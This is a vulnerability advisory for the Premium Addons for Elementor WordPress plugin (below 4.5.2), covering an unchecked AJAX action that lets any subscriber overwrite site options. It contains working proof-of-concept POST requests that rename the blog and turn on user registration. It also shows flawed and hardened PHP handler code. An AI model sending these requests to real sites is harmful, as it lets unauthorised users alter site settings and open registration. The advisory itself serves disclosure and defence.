Premium Addons for Elementor < 4.5.2 - Subscriber+ Arbitrary Blog Option Update

Description

The plugin does not perform any CSRF or authorisation checks in the pa_dismiss_admin_notice AJAX action, which is available to any authenticated user, and does not validate the option key to ensure that the option being updated belongs to the plugin. As a result, any authenticated user, such as a subscriber, can update arbitrary WordPress options and set them to the value '1'. An attacker changing users_can_register would enable user registration; other options could be changed to make the blog unusable as well.

Proof of Concept

Change the Blogname to '1'

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Cookie: [any authenticated user]
Connection: close

action=pa_dismiss_admin_notice&notice=blogname


To enable registration:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Cookie: [any authenticated user]
Connection: close

action=pa_dismiss_admin_notice&notice=users_can_register
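The requests above work because the handler behind the wp_ajax_pa_dismiss_admin_notice hook runs for every logged-in user regardless of role and writes whatever option name the request supplies. The following is an added illustration, not the plugin's actual source: a minimal reconstruction of the flawed handler pattern the description implies, next to a hardened version that adds the three missing controls (nonce check, capability check, allowlist of plugin-owned option keys). The nonce action name 'pa_dismiss_notice', the request field 'nonce' and the option names in the allowlist are assumptions chosen for this example.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: the nonce action
// 'pa_dismiss_notice', the POST field 'nonce' and the allowlisted option keys.

// --- Flawed pattern (as described in the advisory): no nonce, no capability
// check, and the option key is taken straight from the request. wp_ajax_*
// hooks fire for any authenticated user, so a subscriber reaches this code.
// Not registered with add_action here; shown for comparison only.
function pa_dismiss_admin_notice_flawed() {
    $notice = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
    update_option( $notice, '1' ); // 'blogname', 'users_can_register', ... all reachable
    wp_die();
}

// --- Hardened pattern.
add_action( 'wp_ajax_pa_dismiss_admin_notice', 'pa_dismiss_admin_notice_hardened' );
function pa_dismiss_admin_notice_hardened() {
    // 1. CSRF: the request must carry a nonce issued to this user for this action
    //    (the page's JS obtains it via wp_create_nonce( 'pa_dismiss_notice' )).
    //    check_ajax_referer() dies with a 403 response on failure.
    check_ajax_referer( 'pa_dismiss_notice', 'nonce' );

    // 2. Authorisation: dismissing admin notices is an administrative action,
    //    so require a real capability instead of "is logged in".
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input validation: only option keys this plugin owns may be written.
    //    An allowlist is stricter than a prefix check and cannot be widened
    //    by the caller.
    $allowed = array( 'pa_notice_review_dismissed', 'pa_notice_upgrade_dismissed' ); // assumed
    $notice  = isset( $_POST['notice'] ) ? sanitize_key( wp_unslash( $_POST['notice'] ) ) : '';
    if ( ! in_array( $notice, $allowed, true ) ) {
        wp_send_json_error( 'invalid notice key', 400 );
    }

    update_option( $notice, '1' );
    wp_send_json_success();
}
```

Any one of the three controls would have stopped the requests shown in the proof of concept: the nonce check blocks cross-site requests and unauthenticated scripts, the capability check excludes subscribers, and the allowlist prevents core options such as blogname or users_can_register from being named at all. Defenders reviewing other plugins can apply the same checklist to every wp_ajax_ handler that calls update_option with a request-controlled key.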

Affects Plugins

Classification

Type
ACCESS CONTROLS
CWE
CVSS

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes

Timeline

Publicly Published
2021-08-30
Added
2021-08-30
Last Updated
2021-08-30

Other